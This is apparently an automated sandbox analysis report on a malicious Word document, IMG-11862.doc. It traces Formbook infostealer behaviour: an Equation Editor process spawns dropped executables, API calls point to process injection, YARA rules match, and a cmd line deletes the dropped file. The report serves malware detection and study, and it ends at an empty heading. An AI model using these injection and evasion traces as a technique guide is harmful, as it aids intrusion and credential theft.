Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00841148 NtOpenThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008407AC NtCreateMutant,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083F8CC NtWaitForSingleObject,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00841930 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083F938 NtWriteFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FAB8 NtQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FA20 NtQueryInformationFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FA50 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FBE8 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FB50 NtCreateKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FC30 NtOpenProcess,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00840C40 NtGetContextThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FC48 NtSetInformationFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00841D80 NtSuspendThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FD5C NtEnumerateKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FE24 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FFFC NtCreateProcessEx,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E100C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E107AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0F9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0F900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FAB8 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E101D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E11148 NtOpenThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E1010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E110D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E10060 NtQuerySection,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E10078 NtResumeThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E10048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E11930 NtSetContextThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0F938 NtWriteFile,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0F8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E11D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E10C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E0FE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00099D60 NtCreateFile,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00099E10 NtReadFile,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00099E90 NtClose,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00099F40 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00099DB3 NtCreateFile,
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00099E8A NtClose,

Source: C:\Users\Public\69577.exe

Code function: 4_2_006B11E0 CreateProcessAsUserW,

Source: C:\Users\Public\69577.exe	Code function: 4_2_00255C5A
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025B919
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025AE68
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025A66A
Source: C:\Users\Public\69577.exe	Code function: 4_2_00258E49
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025E748
Source: C:\Users\Public\69577.exe	Code function: 4_2_00257388
Source: C:\Users\Public\69577.exe	Code function: 4_2_00254FD0
Source: C:\Users\Public\69577.exe	Code function: 4_2_00254D60
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025AE66
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025F258
Source: C:\Users\Public\69577.exe	Code function: 4_2_0025E738
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B6448
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B30E1
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B7138
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B99D9
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B1DB9
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B52D0
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B13D1
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B4BA0
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B6439
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B7C10
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B68C0
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B68B1
Source: C:\Users\Public\69577.exe	Code function: 4_2_006B8890
Source: C:\Users\Public\69577.exe	Code function: 4_2_006BA608
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00401026
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00401174
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00401208
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041E2AF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041E772
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00E02050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0084E0C6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0087D005
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00853040
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0086905A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0084E2E9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008F1238
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0084F3CF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008763DB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00852305
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00857353
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0089A37B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00885485
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00861489
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0088D47D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0086C5F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0085351F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00896540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00854680
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0085E6C1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008F2622
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008D579A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0085C7BC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008857C3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008EF8EE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0085C85C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0087286D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008F098E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008529B2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008669FE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008D5955
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00903A83
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008FCBA4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0084FBD7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008DDBDA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00877B00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008EFDDD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00880D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0085CD5B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00882E2F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0086EE4C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00860F3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0087DF7C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E1E0C6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E23040
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E3905A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E4D005
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E1F3CF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E463DB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E6A37B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E27353
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E22305
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E1E2E9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EC1238
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E3C5F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E2351F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E55485
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E31489
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E5D47D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E557C3
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E2C7BC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EA579A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E2E6C1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E24680
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EC2622
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E369FE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E229B2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EC098E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EA5955
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EBF8EE
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E4286D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E2C85C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EADBDA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E1FBD7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01ECCBA4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E47B00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01ED3A83
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01EBFDDD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E2CD5B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E50D3B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E4DF7C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E30F3F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E3EE4C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_01E52E2F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009E2AF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_0009E772
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00082D87
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00082D90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00089E40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_00082FB0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 161BCBF5F7D766B70ACE9CDF7B3B250D256AB601720F09F4183A1FA4F92DCF54

Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 01E63F92 appears 108 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 01E8F970 appears 81 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 01E6373B appears 238 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 01E1DF5C appears 112 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 01E1E2A8 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 0084DF5C appears 118 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 00893F92 appears 108 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 008BF970 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 0089373B appears 238 times
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: String function: 0084E2A8 appears 38 times

Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@9/13@4/4

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$G-11862.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC966.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................\|.......(.P.....................................................0.......................l.......p.<.......<.....
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ....................\|.<.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........p1........4.t...........0.......................&.................<.....

Source: C:\Users\Public\69577.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\69577.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\69577.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: IMG-11862.doc	Virustotal: Detection: 38%
Source: IMG-11862.doc	ReversingLabs: Detection: 24%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: unknown	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: C:\Users\Public\69577.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\69577.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: IMG-11862.doc

Static file information: File size 1817663 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: systray.pdbB source: AddInProcess32.exe, 00000005.00000002.2158465105.0000000000464000.00000004.00000020.sdmp
Source:	Binary string: AddInProcess32.pdb}o source: 69577.exe, 00000004.00000003.2100576876.00000000062C3000.00000004.00000001.sdmp
Source:	Binary string: AddInProcess32.pdb source: 69577.exe, 00000004.00000003.2100576876.00000000062C3000.00000004.00000001.sdmp, AddInProcess32.exe
Source:	Binary string: systray.pdb source: AddInProcess32.exe, 00000005.00000002.2158465105.0000000000464000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, systray.exe

Data Obfuscation:

